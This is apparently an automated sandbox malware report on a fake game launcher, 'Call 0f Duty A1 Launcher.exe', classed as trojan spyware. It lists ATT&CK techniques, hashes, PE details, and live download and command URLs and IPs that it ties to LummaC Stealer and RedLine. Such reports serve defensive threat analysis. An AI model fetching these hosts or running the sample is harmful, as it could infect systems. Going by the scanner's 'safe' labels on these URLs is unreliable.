Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	11 Virtualization/Sandbox Evasion	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	31 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	141 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	11 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	21 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Call 0f Duty A1 Launcher.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://property-imper.sbs/apic	0%	Avira URL Cloud	safe
http://147.45.47.81/conhost.exefi	0%	Avira URL Cloud	safe
https://property-imper.sbs/apiU	0%	Avira URL Cloud	safe
http://147.45.47.81/	0%	Avira URL Cloud	safe
http://147.45.47.81/conhost.exebsxn	0%	Avira URL Cloud	safe
https://property-imper.sbs/apiG	0%	Avira URL Cloud	safe
http://147.45.47.81/conhost.exe	0%	Avira URL Cloud	safe
http://147.45.47.81/f1	0%	Avira URL Cloud	safe
https://property-imper.sbs/apiWi.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
property-imper.sbs	104.21.33.116	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://property-imper.sbs/api	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs/apic	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1821410726.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089564512.00000000035FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.47.81/	Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.47.81/f1	Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs/apiU	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756574371.00000000035E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://property-imper.sbs/apiWi.	Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1861877709.00000000035C3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714414750.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1713948683.0000000005DAC000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734750561.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734966106.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714245513.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.47.81/conhost.exebsxn	Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714414750.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1713948683.0000000005DAC000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734750561.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734966106.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714245513.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.47.81/conhost.exe	Call 0f Duty A1 Launcher.exe, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090524396.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089619359.0000000003543000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089564512.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090339829.0000000003543000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs/	Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089619359.000000000356F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.47.81/conhost.exefi	Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://property-imper.sbs/apiG	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1780276053.00000000035F5000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090524396.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1821410726.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089564512.00000000035FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714245513.0000000005D80000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1713948683.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714245513.0000000005D80000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.33.116	property-imper.sbs	United States		13335	CLOUDFLARENETUS	false
147.45.47.81	unknown	Russian Federation		2895	FREE-NET-ASFREEnetEU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561495
Start date and time:	2024-11-23 15:05:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Call 0f Duty A1 Launcher.exe
Detection:	MAL
Classification:	mal92.troj.spyw.evad.winEXE@4/0@1/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 83% Number of executed functions: 14 Number of non-executed functions: 33
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Call 0f Duty A1 Launcher.exe, PID 7328 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Call 0f Duty A1 Launcher.exe

Simulations

Behavior and APIs

Time	Type	Description
09:05:59	API Interceptor	8x Sleep call for process: Call 0f Duty A1 Launcher.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.33.116	Aura.exe	Get hash	malicious	Unknown	Browse
	injector V2.4.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	Script.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
147.45.47.81	Script.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.47.81/conhost.exe
	n7ZKbApaa3.dll	Get hash	malicious	LummaC, Xmrig	Browse	147.45.47.81/WinRing0x64.sys
	PqSIlYOaIF.exe	Get hash	malicious	LummaC, Xmrig	Browse	147.45.47.81/WinRing0x64.sys
	Set-up.exe	Get hash	malicious	LummaC	Browse	147.45.47.81/conhost.exe
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.47.81/conhost.exe
	inject.exe	Get hash	malicious	RedLine, Xmrig	Browse	147.45.47.81/conhost.exe
	BlazeHack.exe	Get hash	malicious	PureLog Stealer, RedLine, Xmrig	Browse	147.45.47.81/WinRing0x64.sys
	CKHSihDX4S.exe	Get hash	malicious	RedLine, Xmrig	Browse	147.45.47.81/WinRing0x64.sys
	XXZahG4d9Z.exe	Get hash	malicious	RedLine, Xmrig	Browse	147.45.47.81/WinRing0x64.sys
	n6o0pd9pZC.exe	Get hash	malicious	Xmrig	Browse	147.45.47.81/WinRing0x64.sys

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
property-imper.sbs	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	Aura.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	injector V2.4.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	104.21.33.116
	file.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	Unknown	Browse	104.21.33.116

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	arcaneloader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.223.140
	unturnedHack.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	file.exe	Get hash	malicious	Unknown	Browse	104.21.70.128
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	xLauncher.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.198.61
	Aura.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	injector V2.5.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.88.250
	injector V2.4.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.44.93
FREE-NET-ASFREEnetEU	Script.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.47.81
	https://docs.google.com/drawings/d/15fSe2159qP21C2NrS3K5cgcsyPwNINvux6xIUCvvgBU/preview?pli=1AmyVazquez-brian.nester@lvhn.org	Get hash	malicious	HTMLPhisher	Browse	147.45.178.112
	http://147.45.47.98/js/error.js	Get hash	malicious	Unknown	Browse	147.45.47.98
	hmips.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	ppc.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	mips.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	x86.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	owari.mips.elf	Get hash	malicious	Unknown	Browse	147.45.234.212
	pdusf6w2SJ.exe	Get hash	malicious	RedLine	Browse	147.45.44.221
	ppc.elf	Get hash	malicious	Unknown	Browse	193.233.193.45

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	arcaneloader.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	xLauncher.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	Aura.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	injector V2.5.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	injector V2.4.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	injector V2.4.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.728754242194129
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Call 0f Duty A1 Launcher.exe
File size:	495'616 bytes
MD5:	fad119b9db79ccbfe3a65a13f0822b22
SHA1:	db0992d62adb36a46b493063dd5192bb27422bb9
SHA256:	27550a73b832d92b6a6a3869f0dedbb826c7c97348587342fe02c8c7cf98e0b9
SHA512:	41c629c773500fc55b3da2b726045ce88d1f5ae7f35800666c4465bb1d7b8fd3e8aa71e7a99f8c607f64d77916a704e9da7bf0ed2d06844864ad138fe5a2df2f
SSDEEP:	12288:SJB+nneDgkXFEIs2Gvih6W8Rd70dDufr3/:2AoR24BhL4r3/
TLSH:	60B4F06E3393A0A3E5A3183141D89EB5456E7E300F34A4FB57605BB92F3A6D2C532E17
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...t.@g............................pX............@.......................................@.................................T...<..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x415870
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6740AA74 [Fri Nov 22 15:59:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	887797384d81c493a9d8ee55dad3b2e1

Entrypoint Preview

Instruction
call 00007F794D5A4ABAh
jmp 00007F794D5A491Dh
mov ecx, dword ptr [0042B5F0h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F794D5A4AB6h
test esi, ecx
jne 00007F794D5A4AD8h
call 00007F794D5A4AE1h
mov ecx, eax
cmp ecx, edi
jne 00007F794D5A4AB9h
mov ecx, BB40E64Fh
jmp 00007F794D5A4AC0h
test esi, ecx
jne 00007F794D5A4ABCh
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [0042B5F0h], ecx
not ecx
pop edi
mov dword ptr [0042B5ECh], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
and dword ptr [ebp-0Ch], 00000000h
lea eax, dword ptr [ebp-0Ch]
and dword ptr [ebp-08h], 00000000h
push eax
call dword ptr [0042946Ch]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [00429430h]
xor dword ptr [ebp-04h], eax
call dword ptr [0042942Ch]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [004294A8h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 0042C970h
call dword ptr [00429488h]
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov al, 01h
ret
push 00030000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x29254	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2f000	0x1400	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x237c0	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x293c8	0x138	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2169a	0x21800	02aff72e65eaf052f891170e28598361	False	0.550606343283582	data	6.737058354414408	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x23000	0x7264	0x7400	91e5fdecc510d2c4e72b1b50db3c2501	False	0.40641837284482757	data	4.769873714467996	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2b000	0x2068	0x1000	f9b2b4b1f63578440eedd0ace5ac94f1	False	0.484375	OpenPGP Secret Key	5.090094544660231	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.00cfg	0x2e000	0x8	0x200	160c8b290b62e5e566d05ce3bec76423	False	0.03125	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2f000	0x1400	0x1400	29fb367912ce622b91120c5cffd84495	False	0.81953125	data	6.557860970753822	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.coS	0x31000	0x4d800	0x4d800	dadefaca19565602088c9505a810b233	False	1.0003339213709677	data	7.999391001565712	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

CloseHandle, CompareStringW, CreateFileA, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, 